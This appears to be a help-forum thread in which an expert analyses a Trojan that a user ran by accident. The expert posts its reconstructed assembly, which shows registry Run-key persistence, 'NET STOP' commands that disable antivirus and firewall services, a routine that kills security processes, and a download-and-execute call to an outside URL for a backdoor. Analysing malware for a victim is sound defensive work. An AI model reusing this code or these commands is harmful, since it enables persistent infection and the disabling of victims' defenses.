• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 498
  • Last Modified:

What does this asm code do ??????

Hi,

i got the unfortunate accident of running an exe (it was spoofed as another file) and i don't know what it did,
i can't see anything (atm) changed on my pc or broken. but i still like to know what it did !!!!!
if disassembled the file using some tool and gotten some asm code but i don't understand it so please tell me what it does !
the asm code and program (in case u need it) are both here :
http://users.pandora.be/IMS/help/
The program is called dontrun.ttt i renamed it for safety measures just don't run it cause i don't know what it does
the asm code i gotten is in dontrun.asm

please tell me what it does cause i'm a bit worried thanks !!!!!!

0
joyrider
Asked:
joyrider
  • 4
  • 2
1 Solution
 
BeyondWuCommented:
OK, I have downloaded it, after a little investigation, it seems encrypted with a simple compacter(I don't which tool), so I try to debug it, It's dangerous, so I actually haven't run it really, after the loader decrypted the original code in the memory, I dumped it and then disassemble it.
It's a Trojan virus. please search "windows33.exe" and "xtb.exe" in your PC. the xtb.exe is downloaded from this URL "http://www.phoenix.secure-tech.net/web/xxx.exe"
I will post the asm code in the next comment.
0
 
BeyondWuCommented:
Here is the code, the application list has been omitted, it's too long to put here.
 start:
                 push    100h            ; sizeof szWindowsDir
                 push    offset szWindowsDir
                 call    GetWindowsDirectory
                 push    offset szSlash  ; "\\"
                 push    offset szWindowsDir
                 call    lstrcat
                 push    offset szWindows33_exe ; "windows33.exe"
                 push    offset szWindowsDir
                 call    lstrcat
                 push    offset lpFindFileData
                 push    offset szWindowsDir
                 call    FindFirstFile
                 cmp     eax, 0FFFFFFFFh
                 jz      short NotFound
                 jmp     short FoundIt

 NotFound:
                 push    100h
                 push    offset szVictimExeFile
                 push    0
                 call    GetModuleFileName
                 push    0
                 push    offset szWindowsDir
                 push    offset szVictimExeFile
                 call    CopyFile
                 push    offset sizeofWin33Data
                 push    20006h
                 push    0
                 push    offset aSoftwareMicros ; SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                 push    80000002h
                 call    RegOpenKeyEx
                 push    eax             ; hKey
                 push    offset szWindowsDir
                 push    1
                 push    0
                 push    offset Win33Data ; "windows33"
                 push    ds:sizeofWin33Data
                 call    RegSetValueEx
                 push    ds:sizeofWin33Data
                 call    RegCloseKey

 FoundIt:
                 push    offset szKernel32_dll ; "kernel32.dll"
                 call    GetModuleHandle
                 push    offset aRegisterservic ; "RegisterServiceProcess"
                 push    eax
                 call    GetProcAddress
                 test    eax, eax
                 jz      short CannotFindApi
                 push    1
                 push    0
                 call    eax                                    ; call RegisterServiceProcess
                 jmp     short CallApiSuccessful ; hide myself. only available under Win9x

 CannotFindApi:
                 push    0
                 push    offset aNetStopNavapsv ; "NET STOP NAVAPSVC"
                 call    WinExec
                 push    0
                 push    offset aNetStopPersfw ; "NET STOP PERSFW"
                 call    WinExec
                 push    0
                 push    offset aNetStopAvpcc ; "NET STOP AVPCC"
                 call    WinExec
 
 CallApiSuccessful:
                 lea     esi, pAppList
 
 loopit:
                 lodsb
                 test    al, al                  ; if terminate?
                 jnz     short loopit
                 mov     al, [esi]
                 test    al, al
                 jz      short gotfilenameend
                 push    esi                        ; esi->app name
                 call    killprocess
                 jmp     short loopit

 gotfilenameend:
                 push    100h
                 push    offset szWindowsDir
                 call    GetWindowsDirectory
                 push    offset szSlash  ; "\\"
                 push    offset szWindowsDir
                 call    lstrcat
                 push    offset aXtb_exe ; "xtb.exe"
                 push    offset szWindowsDir
                 call    lstrcat
                 push    offset lpFindFileData
                 push    offset szWindowsDir
                 call    FindFirstFile
                 cmp     eax, 0FFFFFFFFh
                 jz      short HasntFoundIt
                 jmp     short HasFoundIt
 
 HasntFoundIt:
                 call    DownloadIt                  ; if we haven't found it, download it from
                                                                   ; http://www.phoenix.secure-tech.net/web/xxx.exe
 HasFoundIt:
                 push    1388h
                 call    Sleep
                 push    offset aKernel32_dll ; "kernel32.dll"
                 call    GetModuleHandle
                 push    offset aRegisterservic ; "RegisterServiceProcess"
                 push    eax
                 call    GetProcAddress
                 test    eax, eax
                 jz      CannotFindApi
                 jmp     CallApiSuccessful

                 push    eax
                 call    ExitProcess
 
 
 
 killprocess    proc szTargetExeName:LPSTR
                         LOCAL szTmpExeFile[256]:BYTE
                         LOCAL procsentry:PROCESSENTRY32
                 push    ebp
                 mov     ebp, esp
                 add     esp, 0FFFFFDD4h
                 mov     procsentry.dwSize, sizeof PROCESSENTRY32 ;128h
                 push    0      ; means current process
                 push    2
                 call    CreateToolhelp32Snapshot
                 mov     hSnapshot, eax
                 mov     edi, szTargetExeName
                 lea     eax, procsentry
                 push    eax
                 push    hSnapshot
                 call    Process32First
 
 continue:
                 lea     eax, szTmpExeFile
                 push    eax
                 lea     eax, procsentry.szExeFile
                 push    eax
                 call    splitfilename            ; get the file name separate from the path
                 lea     eax, szTmpExeFile
                 push    eax
                 push    edi
                 call    lstrcmpi                  ; compare the exe name with szTargetExeName
                 test    eax, eax
                 jnz     short notequal
                 push    procsentry.th32ProcessID
                 push    0
                 push    1
                 call    OpenProcess                  ; get target process handle
                 push    0
                 push    eax
                 call    TerminateProcess      ; terminate it.
                 push    64h
                 call    Sleep
 
 notequal:
                 lea     eax, procsentry
                 push    eax
                 push    hSnapshot
                 call    Process32Next            ; find next
                 test    eax, eax
                 jz      short finished
                 jmp     short continue
 
 finished:
                 push    hSnapshot
                 call    CloseHandle
                 leave
                 retn    4
 killprocess    endp
 
 
 splitfilename    proc szPathName:LPSTR, szName:LPSTR
                 push    ebp
                 mov     ebp, esp
                 push    esi
                 push    edi
                 push    ebx
                 push    eax
                 mov     esi, szPathName
                 mov     ebx, esi
 
 searchagain:
                 lodsb
                 cmp     al, 0                        ; if terminate?
                 jz      short finished
                 cmp     al, '\'
                 jnz     short searchagain      ; find the '\'
                 mov     ebx, esi                  ; save the position of next char
                 jmp     short searchagain      ; actually, need to find last '\'
 
 finished:
                 mov     edi, szName
                 mov     esi, ebx
 
 loooop:
                 lodsb                                    ; copy the name except the path
                 stosb
                 cmp     al, 0
                 jnz     short loooop
                 pop     eax
                 pop     ebx
                 pop     edi
                 pop     esi
                 leave
                 retn    8
 splitfilename    endp
 
 
 
 DownloadIt      proc near
 repeatit:
                 push    offset lpWSAData
                 push    101h
                 call    WSAStartup
                 cmp     eax, 0
                 jnz     short repeatit      ; if not success
 
 doitagain:
                 push    offset szUrlMicrosoft ; "www.microsoft.com"
                 call    gethostbyname
                 cmp     eax, 0
                 jz      short getnameerror      ; false
                 jnz     short getnameok
 
 getnameerror:
                 push    1388h
                 call    Sleep
                 jmp     short doitagain
 
 getnameok:
                 push    0
                 push    0
                 push    offset szWindowsDir
                 push    offset aHttpWww_phoeni ; "http://www.phoenix.secure-tech.net/web/xxx.exe"
                 push    0
                 call    URLDownloadToFile
                 push    0
                 push    offset szWindowsDir
                 call    WinExec                              ; download it, then execute it.
                 xor     eax, eax
                 call    WSACleanup
                 retn
 DownloadIt      endp

 aXtb_exe        db 'xtb.exe'
                 db 20 dup(0)  
 aHttpWww_phoeni db 'http://www.phoenix.secure-tech.net/web/xxx.exe',0
                 dd 4 dup(0)
                 align 4
 szUrlMicrosoft  db 'www.microsoft.com',0
 aKernel32_dll   db 'kernel32.dll',0
 aRegisterservic db 'RegisterServiceProcess',0
 pAppList        db    0 ;  
 a_avpcc_exe     db '_AVPCC.EXE',0
      ; ... here a long list of application's name omitted ...
 aZonealarm_exe  db 'ZONEALARM.EXE'
                 db 3 dup(0)
 aNetStopNavapsv db 'NET STOP NAVAPSVC',0
 aNetStopAvpcc   db 'NET STOP AVPCC',0
 aNetStopPersfw  db 'NET STOP PERSFW',0
 szSlash         db '\',0
 aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
 Win33Data       db 'windows33',0
                 dd 4 dup(0)
                 db 2 dup(0)
 szWindows33_exe db 'windows33.exe',0
                 dd 4 dup(?)
 sizeofWin33Data dd ?
 hSnapshot              dd ?
                 dd ?
 lpFindFileData  dd 4Fh dup(?)
                 db 2 dup(?)
 szWindowsDir    dd 40h dup(?)
 szVictimExeFile dd 40h dup(?)
 lpWSAData       dd 354h dup(?)
                 db 2 dup(?)
0
 
BeyondWuCommented:
In addition, I just downloaded the 'http://www.phoenix.secure-tech.net/web/xxx.exe', it is compacted with UPX.
0
Keep up with what's happening at Experts Exchange!

Sign up to receive Decoded, a new monthly digest with product updates, feature release info, continuing education opportunities, and more.

 
joyriderAuthor Commented:
Hi i uploaded windows33.exe as well it's seems it's just a copy of the original dontrun.exe file. I also immediatly found out it entered a regentry to the reg so i removed that. After downloading XTB.exe my nav found it as a irc.backdoor.trojan

Now i also used it on an older pc where i had a filemonitor and regmonitor running. What was weird is that the windows33.exe file kept looking in the reg to printer settings and also scanned throught the whole mm256.dat in the inter history folder so i guess it collects the sites u've been to get any passwords.

Now the big question since i removed all the startup functions in the reg for this windows33.exe and removed both windows33.exe and xtb.exe can i assume it's safe now ? tried both a complete system scan and a Trojan scan

Ure getting the points since u helped me but just like to know if i need to format or not
0
 
BeyondWuCommented:
>>it's safe now ?
I think yes, but I'm not completely sure.
Because It's only a trojan, and it seems hasn't any code to infect other *.exe, so I think it maybe safe, because you have scanned whole system. for more safety, you can search the PE file(*.exe, *.dll, *.ocx,..) which has been modified recently, it maybe infected by the virus, if there no any system file modified recently, you can assume it's safe.
0
 
joyriderAuthor Commented:
thanks for the help !รง
0

Featured Post

Free Tool: SSL Checker

Scans your site and returns information about your SSL implementation and certificate. Helpful for debugging and validating your SSL configuration.

One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.

  • 4
  • 2
Tackle projects and never again get stuck behind a technical roadblock.
Join Now